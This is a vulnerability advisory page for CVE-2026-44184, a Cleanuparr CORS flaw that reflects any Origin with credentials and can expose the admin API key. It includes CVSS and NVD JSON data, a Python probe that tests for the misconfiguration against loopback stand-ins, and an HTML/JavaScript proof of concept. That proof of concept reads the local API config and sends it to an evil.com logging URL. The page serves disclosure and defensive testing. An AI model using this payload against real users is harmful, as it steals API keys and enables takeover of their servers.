Security Vulnerability Report
CVE-2026-44184 CVSS 8.0 HIGH

CVE-2026-44184

Published: 2026-05-12 18:17:30
Last Modified: 2026-05-12 19:16:34

Description

Cleanuparr is a tool for automating the cleanup of unwanted or blocked files in Sonarr, Radarr, and supported download clients like qBittorrent. Prior to 2.9.10, Cleanuparr's global CORS policy reflects every request Origin and combines it with AllowCredentials(). When DisableAuthForLocalAddresses is enabled, the API also authenticates requests purely by source IP via TrustedNetworkAuthenticationHandler. The combination lets any website that an admin (or any user on a trusted IP) visits read authenticated API responses cross-origin — including the admin's permanent API key. This vulnerability is fixed in 2.9.10.
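The misconfiguration described above is easy to confirm from outside the browser: send one request with a foreign Origin header and look at what comes back. The script below is an added example, not Cleanuparr's code or the advisory's, that does exactly that check. So that it runs offline it also starts two stand-in loopback servers, one that reflects every Origin with Access-Control-Allow-Credentials: true (the pre-2.9.10 behaviour as described) and one that only answers for a fixed allowed origin; the origins, the /api/config path and the sample API key in the response body are all constructed for the example.

```python
"""
Added example (not Cleanuparr's code): probe an endpoint for the CORS
misconfiguration in CVE-2026-44184, i.e. a server that echoes an
arbitrary request Origin into Access-Control-Allow-Origin and also sends
Access-Control-Allow-Credentials: true.
"""
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Origin of a page the victim might visit. Any value the target has no
# business trusting will do for the probe (constructed, not a real site).
PROBE_ORIGIN = "https://attacker.example"


def check_cors(url, origin=PROBE_ORIGIN, timeout=5.0):
    """Send one GET with a foreign Origin and classify the CORS response.

    reflected   - ACAO echoes the probe origin verbatim. This alone lets a
                  cross-origin page read responses the server authenticates
                  without cookies (e.g. by source IP, as in this CVE).
    credentials - ACAC is "true".
    exploitable - both at once: cookie/session-authenticated responses are
                  readable cross-origin too. Browsers refuse "*" together
                  with credentials, so only an exact echo counts here.
    """
    req = urllib.request.Request(url, headers={"Origin": origin})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        acao = resp.headers.get("Access-Control-Allow-Origin")
        acac = resp.headers.get("Access-Control-Allow-Credentials")
    reflected = acao is not None and acao == origin
    credentials = (acac or "").strip().lower() == "true"
    return {
        "acao": acao,
        "acac": acac,
        "reflected": reflected,
        "credentials": credentials,
        "exploitable": reflected and credentials,
    }


class _StandInHandler(BaseHTTPRequestHandler):
    """Stand-in API endpoint (constructed for this example)."""

    allowed_origin = None  # None => reflect whatever the client sends
    body = b'{"apiKey": "constructed-sample-key"}'  # not a real key

    def do_GET(self):
        origin = self.headers.get("Origin")
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        if self.allowed_origin is None:
            # Vulnerable pattern: echo any Origin and allow credentials.
            if origin:
                self.send_header("Access-Control-Allow-Origin", origin)
                self.send_header("Access-Control-Allow-Credentials", "true")
        elif origin == self.allowed_origin:
            # Fixed pattern: only a configured origin, and Vary on Origin
            # so caches never serve one origin's answer to another.
            self.send_header("Access-Control-Allow-Origin", origin)
            self.send_header("Access-Control-Allow-Credentials", "true")
            self.send_header("Vary", "Origin")
        self.send_header("Content-Length", str(len(self.body)))
        self.end_headers()
        self.wfile.write(self.body)

    def log_message(self, *args):  # keep the example quiet
        pass


class VulnerableHandler(_StandInHandler):
    allowed_origin = None


class FixedHandler(_StandInHandler):
    allowed_origin = "https://cleanuparr.internal.example"  # constructed


def serve(handler_cls):
    """Start a handler on an ephemeral loopback port; returns (server, base_url)."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), handler_cls)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_address[1]


def demo():
    """Probe both stand-ins; returns {'vulnerable': verdict, 'fixed': verdict}."""
    results = {}
    for name, cls in (("vulnerable", VulnerableHandler), ("fixed", FixedHandler)):
        srv, base = serve(cls)
        try:
            results[name] = check_cors(base + "/api/config")
        finally:
            srv.shutdown()
            srv.server_close()
    return results


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(name, verdict)
```

To test a real instance, call check_cors() with its URL instead of the stand-ins. Note that with source-IP authentication the "reflected" flag is already the finding; "exploitable" additionally covers the cookie-authenticated case that AllowCredentials() opens up.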

CVSS Details

CVSS Score
8.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No CPE configuration data is available from NVD. Affected version range per the advisory description:

Cleanuparr < 2.9.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- PoC Concept: Steal API Key from Cleanuparr via CORS -->
<!-- Attacker hosts this on https://evil.com -->
<script>
// Target the local Cleanuparr instance (port 3985 is the value this PoC assumes)
const targetUrl = 'http://localhost:3985/api/config';

function exploit() {
  fetch(targetUrl, {
    method: 'GET',
    // 'include' sends any session cookie with the request. With
    // DisableAuthForLocalAddresses the server authenticates by source IP
    // anyway; the reflected Origin plus Access-Control-Allow-Credentials: true
    // is what lets this page read the response.
    credentials: 'include'
  })
    .then(response => response.json())
    .then(data => {
      // Exfiltrate the sensitive data (e.g., API Key)
      console.log('Leaked Data:', data);
      fetch('https://evil.com/log?key=' + encodeURIComponent(JSON.stringify(data)));
    })
    .catch(error => console.error('Error:', error));
}

// Trigger the attack automatically. Loopback counts as a potentially
// trustworthy origin, so the https-to-http request is not blocked as mixed
// content; browsers that enforce Private Network Access may still block or
// preflight it.
exploit();
</script>

References

https://github.com/Cleanuparr/Cleanuparr/security/advisories/GHSA-rwpc-36mg-fpvf

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-44184",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-12T18:17:29.583",
    "lastModified": "2026-05-12T19:16:33.937",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Cleanuparr is a tool for automating the cleanup of unwanted or blocked files in Sonarr, Radarr, and supported download clients like qBittorrent. Prior to 2.9.10, Cleanuparr's global CORS policy reflects every request Origin and combines it with AllowCredentials(). When DisableAuthForLocalAddresses is enabled, the API also authenticates requests purely by source IP via TrustedNetworkAuthenticationHandler. The combination lets any website that an admin (or any user on a trusted IP) visits read authenticated API responses cross-origin — including the admin's permanent API key. This vulnerability is fixed in 2.9.10."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 8.0,
            "baseSeverity": "HIGH",
            "attackVector": "ADJACENT_NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.1,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-346" },
          { "lang": "en", "value": "CWE-942" }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/Cleanuparr/Cleanuparr/security/advisories/GHSA-rwpc-36mg-fpvf",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/Cleanuparr/Cleanuparr/security/advisories/GHSA-rwpc-36mg-fpvf",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}